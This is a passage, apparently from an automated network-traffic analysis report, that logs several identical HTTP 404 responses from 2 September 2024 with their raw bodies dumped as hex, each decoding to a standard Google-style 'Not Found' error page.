74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:11 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:13 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:14 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:15 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:16 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:17 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 